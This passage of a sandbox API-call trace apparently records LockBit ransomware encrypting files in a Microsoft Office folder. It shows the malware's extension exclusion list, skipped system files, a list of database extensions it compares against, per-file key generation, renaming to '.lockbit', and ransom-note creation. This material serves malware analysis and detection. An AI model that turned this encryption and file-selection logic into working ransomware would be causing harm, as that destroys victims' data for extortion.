Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21342_.GIF.lockbit") returned 78 [0204.470] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21342_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21342_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.472] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.472] malloc (_Size=0x40068) returned 0x3df0008 [0204.472] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=266) returned 1 [0204.472] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.472] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.473] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.473] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.473] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.477] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21342_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21342_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.477] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.477] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.478] free (_Block=0x1fa2ed8) [0204.478] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21342_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.478] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.478] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.478] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d01a600, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbce14f00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x8d01a600, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0xb6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21343_.GIF", cAlternateFileName="")) returned 1 [0204.478] lstrcmpiW (lpString1=".", lpString2="BD21343_.GIF") returned -1 [0204.478] lstrcmpiW (lpString1="..", lpString2="BD21343_.GIF") returned -1 [0204.478] PathFindExtensionW (pszPath="BD21343_.GIF") returned=".GIF" [0204.478] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.478] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.478] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.478] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.478] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.478] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.478] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.478] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.478] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.478] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.478] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.478] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.478] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.478] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.478] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.479] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.479] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.479] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.479] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.479] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.479] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.480] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.480] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.480] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.480] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.480] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.480] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.480] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.480] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.480] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21343_.GIF") returned 1 [0204.480] lstrcmpiW (lpString1="ntldr", lpString2="BD21343_.GIF") returned 1 [0204.480] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21343_.GIF") returned 1 [0204.480] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21343_.GIF") returned 1 [0204.480] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21343_.GIF") returned -1 [0204.480] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21343_.GIF") returned 1 [0204.480] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21343_.GIF") returned 1 [0204.480] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.480] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21343_.GIF") returned=".GIF" [0204.480] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.480] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.480] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.480] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.480] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.480] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.480] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.480] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.480] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.480] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.480] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.480] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.481] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.481] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.481] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.481] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.481] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.481] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.481] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.481] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.481] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.481] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.481] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.481] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.481] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.481] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.481] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.481] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.481] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21343_.GIF.lockbit") returned 78 [0204.481] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21343_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21343_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.483] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.483] malloc (_Size=0x40068) returned 0x3df0008 [0204.483] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=182) returned 1 [0204.483] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.484] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.484] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.489] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21343_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21343_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.489] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.489] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.489] free (_Block=0x1fa2ed8) [0204.489] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21343_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.489] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.489] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.489] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e32d300, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbce3b060, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x8e32d300, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0xb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21344_.GIF", cAlternateFileName="")) returned 1 [0204.489] lstrcmpiW (lpString1=".", lpString2="BD21344_.GIF") returned -1 [0204.489] lstrcmpiW (lpString1="..", lpString2="BD21344_.GIF") returned -1 [0204.489] PathFindExtensionW (pszPath="BD21344_.GIF") returned=".GIF" [0204.489] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.490] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.490] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.490] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.490] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.490] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.490] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.490] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.490] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.490] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.490] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.490] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.490] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.490] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.490] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.491] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.491] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21344_.GIF") returned 1 [0204.491] lstrcmpiW (lpString1="ntldr", lpString2="BD21344_.GIF") returned 1 [0204.491] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21344_.GIF") returned 1 [0204.491] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21344_.GIF") returned 1 [0204.491] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21344_.GIF") returned -1 [0204.491] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21344_.GIF") returned 1 [0204.492] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21344_.GIF") returned 1 [0204.492] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.492] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21344_.GIF") returned=".GIF" [0204.492] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.492] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.492] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.492] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.492] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.492] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.492] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.492] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.492] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.492] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.492] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.492] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.492] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.492] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.492] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.492] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.492] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.492] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.492] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.492] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.492] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.492] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.492] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.492] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.492] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.493] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.493] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.493] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.493] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21344_.GIF.lockbit") returned 78 [0204.493] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21344_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21344_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.498] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.498] malloc (_Size=0x40068) returned 0x3df0008 [0204.498] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=178) returned 1 [0204.498] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.499] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.499] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.499] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.503] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21344_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21344_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.503] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.503] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.503] free (_Block=0x1fa2ed8) [0204.503] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21344_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.503] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.503] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.504] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52007200, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbce3b060, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x52007200, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xf5, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21364_.GIF", cAlternateFileName="")) returned 1 [0204.504] lstrcmpiW (lpString1=".", lpString2="BD21364_.GIF") returned -1 [0204.504] lstrcmpiW (lpString1="..", lpString2="BD21364_.GIF") returned -1 [0204.504] PathFindExtensionW (pszPath="BD21364_.GIF") returned=".GIF" [0204.504] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.504] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.504] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.504] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.504] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.504] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.504] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.504] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.504] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.504] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.504] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.504] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.504] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.504] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.504] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.504] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.504] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.504] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.504] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.504] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.504] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.504] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.504] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.505] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.505] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 